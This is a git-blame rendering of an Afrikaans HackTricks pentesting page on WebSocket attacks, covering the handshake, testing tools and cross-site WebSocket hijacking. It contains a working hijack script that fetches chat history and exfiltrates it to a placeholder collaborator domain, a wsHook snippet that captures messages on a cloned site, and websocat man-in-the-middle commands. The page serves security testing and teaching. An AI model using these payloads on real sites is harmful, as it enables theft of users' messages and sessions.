Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2025-02-17 22:48:32 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/websocket-attacks.md

185 lines
12 KiB
Markdown
Raw Normal View History

Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
# WebSocket-aanvalle
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Opleiding AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Opleiding GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
<summary>Ondersteun HackTricks</summary>
arte
2023-12-31 02:25:17 +01:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% endhint %}
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Wat is WebSockets
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
WebSocket-verbindinge word gevestig deur 'n aanvanklike **HTTP** handdruk en is ontwerp om **langdurig** te wees, wat bidireksionele boodskappe op enige tyd moontlik maak sonder die behoefte aan 'n transaksionele stelsel. Dit maak WebSockets veral voordelig vir toepassings wat **lae latensie of bediener-geïnisieerde kommunikasie** vereis, soos lewendige finansiële datastrome.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
### Vestiging van WebSocket-verbindinge
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
'n Gedetailleerde verduideliking oor die vestiging van WebSocket-verbindinge kan [**hier**](https://infosecwriteups.com/cross-site-websocket-hijacking-cswsh-ce2a6b0747fc) verkry word. In samevatting, WebSocket-verbindinge word gewoonlik geïnisieer via kliënt-kant JavaScript soos hieronder getoon:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```javascript
GITBOOK-4104: change request with no subject merged in GitBook
2023-09-29 15:36:01 +00:00
var ws = new WebSocket("wss://normal-website.com/ws");
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Die `wss` protokol dui 'n WebSocket-verbinding aan wat met **TLS** beveilig is, terwyl `ws` 'n **onbeveiligde** verbinding aandui.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Tydens die verbinding tot stand kom, word 'n handdruk tussen die blaaier en die bediener oor HTTP uitgevoer. Die handdrukproses behels dat die blaaiers 'n versoek stuur en die bediener antwoordgee, soos in die volgende voorbeelde geïllustreer:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Blaaier stuur 'n handdrukversoek:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```javascript
GET /chat HTTP/1.1
Host: normal-website.com
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: wDqumtseNBJdhkihL6PW7w==
Connection: keep-alive, Upgrade
Cookie: session=KOsEJNuflw4Rd9BDNrVmvwBF9rEijeE2
Upgrade: websocket
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Server se handdruk antwoord:
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
```javascript
HTTP/1.1 101 Switching Protocols
Connection: Upgrade
Upgrade: websocket
Sec-WebSocket-Accept: 0FFP+2nmNIf/h+4BP36k9uzrYGk=
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Die verbinding bly oop vir boodskapuitruiling in beide rigtings sodra dit gevestig is.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**Belangrike Punten van die WebSocket Handshake:**
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
- Die `Connection` en `Upgrade` koptekste dui die begin van 'n WebSocket-handshake aan.
- Die `Sec-WebSocket-Version` koptekst dui die verlangde WebSocket-protokolweergawe aan, gewoonlik `13`.
- 'n Base64-gecodeerde ewekansige waarde word in die `Sec-WebSocket-Key` koptekst gestuur, wat verseker dat elke handshake uniek is, wat help om probleme met kasproxies te voorkom. Hierdie waarde is nie vir outentisering nie, maar om te bevestig dat die antwoord nie deur 'n verkeerd geconfigureerde bediener of kas gegenereer is nie.
- Die `Sec-WebSocket-Accept` koptekst in die bediener se antwoord is 'n hash van die `Sec-WebSocket-Key`, wat die bediener se bedoeling om 'n WebSocket-verbinding te open, verifieer.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Hierdie kenmerke verseker dat die handshake-proses veilig en betroubaar is, wat die pad baan vir doeltreffende regte-tyd kommunikasie.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Linux-konsol
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Jy kan `websocat` gebruik om 'n rou verbinding met 'n websocket te vestig.
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```bash
GitBook: [master] one page modified
2021-02-22 15:05:55 +00:00
websocat --insecure wss://10.10.10.10:8000 -v
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
Of om 'n websocat-bediener te skep:
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```bash
websocat -s 0.0.0.0:8000 #Listen in port 8000
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### MitM websocket verbindings
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
As jy vind dat kliënte verbind is met 'n **HTTP websocket** vanaf jou huidige plaaslike netwerk, kan jy 'n [ARP Spoofing Attack ](../generic-methodologies-and-resources/pentesting-network/#arp-spoofing)probeer om 'n MitM-aanval tussen die kliënt en die bediener uit te voer.\
Sodra die kliënt probeer om te verbind, kan jy dan gebruik maak van:
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```bash
websocat -E --insecure --text ws-listen:0.0.0.0:8000 wss://10.10.10.10:8000 -v
```
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
### Websockets opsporing
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Jy kan die **tool** [**https://github.com/PalindromeLabs/STEWS**](https://github.com/PalindromeLabs/STEWS) **gebruik om bekend** **kwesbaarhede** in websockets outomaties te ontdek, te vingerafdruk en te soek.
GitBook: [#2928] No subject
2021-12-30 10:14:05 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Websocket Foutopsporing gereedskap
GITBOOK-4018: change request with no subject merged in GitBook
2023-07-30 21:28:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* **Burp Suite** ondersteun MitM websockets kommunikasie op 'n baie soortgelyke manier as wat dit vir gewone HTTP kommunikasie doen.
* Die [**socketsleuth**](https://github.com/snyk/socketsleuth) **Burp Suite uitbreiding** sal jou toelaat om beter Websocket kommunikasies in Burp te bestuur deur die **geskiedenis** te verkry, **afluisterreëls** in te stel, **ooreenkoms en vervang** reëls te gebruik, **Intruder** en **AutoRepeater** te gebruik.
* [**WSSiP**](https://github.com/nccgroup/wssip)**:** Kort vir "**WebSocket/Socket.io Proxy**", hierdie tool, geskryf in Node.js, bied 'n gebruikerskoppelvlak om **te vang, af te luister, pasgemaakte** boodskappe te stuur en al WebSocket en Socket.IO kommunikasies tussen die kliënt en bediener te sien.
* [**wsrepl**](https://github.com/doyensec/wsrepl) is 'n **interaktiewe websocket REPL** wat spesifiek vir penetrasietoetsing ontwerp is. Dit bied 'n koppelvlak om **inkomende websocket boodskappe te observeer en nuwe te stuur**, met 'n maklik-om-te-gebruik raamwerk vir **outomatisering** van hierdie kommunikasie.&#x20;
* [**https://websocketking.com/**](https://websocketking.com/) dit is 'n **web om te kommunikeer** met ander webs deur middel van **websockets**.
* [**https://hoppscotch.io/realtime/websocket**](https://hoppscotch.io/realtime/websocket) onder ander tipes kommunikasies/protokolle, bied dit 'n **web om te kommunikeer** met ander webs deur middel van **websockets.**
GITBOOK-4018: change request with no subject merged in GitBook
2023-07-30 21:28:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
## Websocket Laboratorium
GITBOOK-4018: change request with no subject merged in GitBook
2023-07-30 21:28:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
In [**Burp-Suite-Extender-Montoya-Course**](https://github.com/federicodotta/Burp-Suite-Extender-Montoya-Course) het jy 'n kode om 'n web te begin met websockets en in [**hierdie pos**](https://security.humanativaspa.it/extending-burp-suite-for-fun-and-profit-the-montoya-way-part-3/) kan jy 'n verduideliking vind.
GITBOOK-4018: change request with no subject merged in GitBook
2023-07-30 21:28:42 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
## Cross-site WebSocket kaping (CSWSH)
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
**Cross-site WebSocket kaping**, ook bekend as **cross-origin WebSocket kaping**, word geïdentifiseer as 'n spesifieke geval van **[Cross-Site Request Forgery (CSRF)](csrf-cross-site-request-forgery.md)** wat WebSocket handdrukke beïnvloed. Hierdie kwesbaarheid ontstaan wanneer WebSocket handdrukke slegs via **HTTP koekies** outentiseer sonder **CSRF tokens** of soortgelyke sekuriteitsmaatreëls.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Aanvallers kan dit benut deur 'n **kwaadaardige webblad** te huisves wat 'n cross-site WebSocket verbinding na 'n kwesbare toepassing inisieer. Gevolglik word hierdie verbinding as deel van die slagoffer se sessie met die toepassing beskou, wat die gebrek aan CSRF beskerming in die sessie hanteringsmeganisme benut.
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
### Eenvoudige Aanval
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Let daarop dat wanneer 'n **websocket** verbinding **gestig** word, die **koekie** na die bediener **gestuur** word. Die **bediener** mag dit gebruik om elke **spesifieke** **gebruiker** met sy **websocket** **sessie gebaseer op die gestuurde koekie** te **verbind**.
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Dan, as die **websocket** **bediener** **die geskiedenis van die gesprek** van 'n gebruiker terugstuur as 'n boodskap met "**READY"** gestuur word, dan sal 'n **eenvoudige XSS** wat die verbinding tot stand bring (die **koekie** sal **automaties** gestuur word om die slagoffer gebruiker te magtig) **wat** "**READY**" **stuur**, in staat wees om die geskiedenis van die **gesprek** te **herwin**.
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```markup
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
<script>
websocket = new WebSocket('wss://your-websocket-URL')
websocket.onopen = start
websocket.onmessage = handleReply
function start(event) {
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
websocket.send("READY"); //Send the message to retreive confidential information
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
function handleReply(event) {
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
//Exfiltrate the confidential information to attackers server
fetch('https://your-collaborator-domain/?'+event.data, {mode: 'no-cors'})
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
}
</script>
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Cross Origin + Cookie with a different subdomain
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
In hierdie blogpos [https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/](https://snyk.io/blog/gitpod-remote-code-execution-vulnerability-websockets/) het die aanvaller daarin geslaag om **arbitraire Javascript in 'n subdomein** van die domein waar die web socket kommunikasie plaasgevind het, te **voer**. Omdat dit 'n **subdomein** was, is die **cookie** **gestuur**, en omdat die **Websocket nie die Origin behoorlik nagegaan het nie**, was dit moontlik om met dit te kommunikeer en **tokens van dit te steel**.
GITBOOK-3824: No subject
2023-03-15 09:29:52 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
### Stealing data from user
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Kopieer die webtoepassing wat jy wil naboots (die .html-lêers byvoorbeeld) en voeg hierdie kode by die skrip waar die websocket kommunikasie plaasvind:
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```javascript
//This is the script tag to load the websocket hooker
<script src='wsHook.js'></script>
//These are the functions that are gonig to be executed before a message
//is sent by the client or received from the server
//These code must be between some <script> tags or inside a .js file
wsHook.before = function(data, url) {
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "client_msg?m="+data, true);
xhttp.send();
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
}
wsHook.after = function(messageEvent, url, wsObject) {
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
var xhttp = new XMLHttpRequest();
xhttp.open("GET", "server_msg?m="+messageEvent.data, true);
xhttp.send();
return messageEvent;
fix bad chars
2022-04-05 18:24:52 -04:00
}
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Nou laai die `wsHook.js`-lêer af van [https://github.com/skepticfx/wshook](https://github.com/skepticfx/wshook) en **stoor dit binne die gids met die weblêers**.\
Deur die webtoepassing bloot te stel en 'n gebruiker te laat aansluit, sal jy in staat wees om die gestuurde en ontvangde boodskappe via websocket te steel:
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
```javascript
sudo python3 -m http.server 80
```
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
## Wedreningsvoorwaardes
GitBook: [master] one page modified
2021-02-22 16:59:36 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Wedreningsvoorwaardes in WebSockets is ook 'n ding, [kyk hierdie inligting om meer te leer](race-condition.md#rc-in-websockets).
GITBOOK-4096: change request with no subject merged in GitBook
2023-09-26 11:09:53 +00:00
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Ander kwesbaarhede
GitBook: [master] 351 pages and 442 assets modified
2020-07-15 15:43:14 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Aangesien Web Sockets 'n meganisme is om **data na die bediener- en kliëntkant te stuur**, afhangende van hoe die bediener en kliënt die inligting hanteer, **kan Web Sockets gebruik word om verskeie ander kwesbaarhede soos XSS, SQLi of enige ander algemene web kwesbaarheid te benut deur die invoer van 'n gebruiker vanaf 'n websocket.**
GitBook: [master] one page modified
2021-02-23 13:55:20 +00:00
GitBook: [#3259] No subject
2022-06-19 14:00:50 +00:00
## **WebSocket Smuggling**
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
Hierdie kwesbaarheid kan jou toelaat om **omgekeerde proxybeperkings te omseil** deur hulle te laat glo dat 'n **websocket kommunikasie gevestig is** (selfs al is dit nie waar nie). Dit kan 'n aanvaller toelaat om **verborgene eindpunte te benader**. Vir meer inligting, kyk na die volgende bladsy:
GitBook: [#3259] No subject
2022-06-19 14:00:50 +00:00
{% content-ref url="h2c-smuggling.md" %}
[h2c-smuggling.md](h2c-smuggling.md)
{% endcontent-ref %}
Translated to Afrikaans
2024-02-11 02:07:06 +00:00
## Verwysings
GitBook: [master] one page modified
2021-02-23 13:55:20 +00:00
a
2024-02-06 04:10:38 +01:00
* [https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages](https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages)
GitBook: [master] 354 pages modified
2020-07-29 09:22:22 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% hint style="success" %}
Leer & oefen AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Leer & oefen GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
<details>
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
<summary>Ondersteun HackTricks</summary>
arte
2023-12-31 02:25:17 +01:00
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
* Kyk na die [**subskripsieplanne**](https://github.com/sponsors/carlospolop)!
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Deel hacking truuks deur PRs in te dien na die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
Ad hacktricks sponsoring
2022-04-28 16:01:33 +00:00
</details>
Translated ['generic-methodologies-and-resources/basic-forensic-methodol
2024-07-19 10:16:39 +00:00
{% endhint %}
Reference in a new issue Copy permalink